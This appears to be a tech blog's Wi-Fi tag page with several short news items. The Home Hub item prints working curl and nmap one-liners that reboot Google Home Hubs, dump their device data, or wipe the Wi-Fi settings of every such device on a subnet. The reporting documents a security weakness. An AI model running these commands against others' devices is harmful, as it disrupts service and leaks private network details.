All posts in “wi-fi”

Google’s Project Fi gets an improved VPN service

Google’s Project Fi wireless service is getting a major update today that introduces an optional always-on VPN service and a smarter way to switch between WiFi and cellular connections.

By default, Fi already uses a VPN service to protect users when they connect to the roughly two million supported WiFi hotspots. Now, Google is expanding this to cellular connections as well. “When you enable our enhanced network, all of your mobile and Wi-Fi traffic will be encrypted and securely sent through our virtual private network (VPN) on every network you connect to, so you’ll have the peace of mind of knowing that others can’t see your online activity,” the team writes in today’s announcement.

Google notes that the VPN also shields all of your traffic from Google itself and that it isn’t tied to your Google account or phone number.

The VPN is part of what Google calls its “enhanced network” and the second part of this announcement is that this network now also allows for a faster switch between WiFi and mobile networks. When you enable this — and both of these features are currently in beta and only available on Fi-compatible phones that run Android Pie — your phone will automatically detect when your WiFi connection gets weaker and fill in those gaps with cellular data. The company says that in its testing, this new system reduces a user’s time without a working connection by up to 40 percent.

These new features will start rolling out to Fi users later this week. They are off by default, so you’ll have to head to the Fi Network Tools in the Project Fi app and turn them on to get started. One thing to keep in mind here: Google says your data usage will likely increase by about 10 percent when you use the VPN.

The Google Home Hub is deeply insecure

Security advocate Jerry Gamblin has posted a set of instructions – essentially basic lines of XML – that can easily pull important information off of the Google Home Hub and, in some cases, temporarily brick the device.

The Home Hub, which is essentially an Android tablet attached to a speaker, is designed to act as an in-room Google Assistant. This means it connects to Wi-Fi (and allows you to see open Wi-Fi access points near the device), receives video and photos from other devices (and broadcasts its pin), and accepts commands remotely (including a quick reboot via the command line).

The command – which consists of a simple URL call via the command line – is clearly part of the setup process. You can try this at home if you replace “hub” with the Home Hub’s local IP address.

curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://hub:8008/setup/reboot

Other one-liners expose further data, including a number of micro services:

$ curl -s http://hub:8008/setup/eureka_info | jq
{
"bssid": "cc:be:59:8c:11:8b",
"build_version": "136769",
"cast_build_revision": "1.35.136769",
"closed_caption": {},
"connected": true,
"ethernet_connected": false,
"has_update": false,
"hotspot_bssid": "FA:8F:CA:9C:AA:11",
"ip_address": "192.168.1.1",
"locale": "en-US",
"location": {
"country_code": "US",
"latitude": 255,
"longitude": 255
},
"mac_address": "11:A1:1A:11:AA:11",
"name": "Hub Display",
"noise_level": -94,
"opencast_pin_code": "1111",
"opt_in": {
"crash": true,
"opencast": true,
"stats": true
},
"public_key": "Removed",
"release_track": "stable-channel",
"setup_state": 60,
"setup_stats": {
"historically_succeeded": true,
"num_check_connectivity": 0,
"num_connect_wifi": 0,
"num_connected_wifi_not_saved": 0,
"num_initial_eureka_info": 0,
"num_obtain_ip": 0
},
"signal_level": -60,
"ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
"ssid": "SSID",
"time_format": 2,
"timezone": "America/Chicago",
"tos_accepted": true,
"uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
"uptime": 25244.52,
"version": 9,
"wpa_configured": true,
"wpa_id": 0,
"wpa_state": 10
}

Finally, this line causes all devices on your network to forget their Wi-Fi, forcing you to reenter the setup process.

nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/(|)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://%:8008/setup/forget_wifi

As Gamblin notes, these holes aren’t showstoppers but they are very alarming. Allowing unauthenticated access to these services is lazy at best and dangerous at worst. He also notes that these endpoints have been open for years on various Google devices, which means this is a regular part of the code base and not considered an exploit by Google.

Again, nothing here is mission critical – no Home Hub will ever save my life – but it would be nice to know that devices based on the platform have some modicum of security, even in the form of authentication or obfuscation. Today we can reboot Grandpa’s overcomplicated picture frame with a single line of code but tomorrow we may be able to reboot Grandpa’s oxygen concentrator.

7 of the best Wi-Fi extenders for increasing your wireless range

For those looking for more than just a Wi-Fi extender, this unit delivers. It also acts as a media server and an access point, offering additional value to the end user. While testing shows it performs very well in terms of 5GHz performance, its 2.4GHz performance is somewhat lagging. It uses AC1200 technology for increased speed, range, and reliability, and is backward compatible with older wireless systems.
There is a power status indicator and an internet status indicator on the front of the device, so you can easily see if your connection is ready to go. On the back of the unit are four gigabit Ethernet ports, a Reset button, a Wi-Fi Protected Setup (WPS) button, a Power button, and a USB port. While having a USB port is convenient for file sharing, it’s only a USB 2.0, rather than the faster USB 3.0. 
Setup is a breeze and takes just minutes with the mobile app, or by using the WPS button. It offers a choice of WEP, WPA, WPA2, or WPS secure encryption. There’s even MAC address filtering, and guest-zone features. 
Amazon user drew writes: 

“I use this to get signal to all corners of my house. My three story home has a hard time getting good coverage for Wifi. This extends the signal of my wireless 802.11N signal to my basement. Just as advertised my speed is about 50% of max speed but I’m not downloading large files when on the extender. It works just fine streaming to my phone or TV over the extender.”

BoxLock secures your booty against porch pirates

This clever – if expensive – product is called the BoxLock and it is a keyless padlock that lets your package delivery person scan and drop off your packages into a locked box. The system essentially watches for a shipping event and then waits for the right barcode before opening. Once the delivery person scans the package, the lock opens, the delivery person sticks the package in a box or shed (not included) and locks it back up. You then go and grab your package at your leisure.

The lock costs $129.

The company appeared on everyone’s favorite show, Shark Tank, where they demonstrated the system with a fake door and fake UPS dude.

The internal battery lasts 30 days on one charge and it connects to your phone and house via Wi-Fi. While the system does require a box – it’s called BoxLock, after all, not LockBox – it’s a clever solution to those pesky porch pirates who endlessly steal my YorkieLoversBox deliveries.

The new version of Wi-Fi is called Wi-Fi 6 because rules don’t matter

The Wi-Fi Alliance, the working group that has long offered such euphonious, IEEE-defined names for Wi-Fi protocols as 802.11ab and 802.11n has finally decided enough was enough with the numbers and letters and such. Their decision? The next Wi-Fi version will be Wi-Fi 6 and sucks to your assmar if you don’t like it.

“For nearly two decades, Wi-Fi users have had to sort through technical naming conventions to determine if their devices support the latest Wi-Fi,” said Wi-Fi Alliance CEO Edgar Figueroa in a release. “Wi-Fi Alliance is excited to introduce Wi-Fi 6, and present a new naming scheme to help industry and Wi-Fi users easily understand the Wi-Fi generation supported by their device or connection.”

Wi-Fi 6 is actually 802.11ax, an improvement on 802.11ac. The ostensible data rate for Wi-Fi 6 is, according to Wikipedia, “37% higher than IEEE 802.11ac, the new amendment is expected to achieve a 4× increase to user throughput due to more efficient spectrum utilization.” It runs eight 5 GHz streams and four 2.4 GHz streams.

In addition to 6 we will now all call 802.11ac Wi-Fi 5 and 802.11n will be called Wi-Fi 4. Devices will be officially certified by generation and the first Wi-Fi 6 devices will arrive in 2019. We would encourage you to stop using the 802.11 nomenclature well before the deadline, ensuring a swift and effortless transition into Wi-Fi chaos.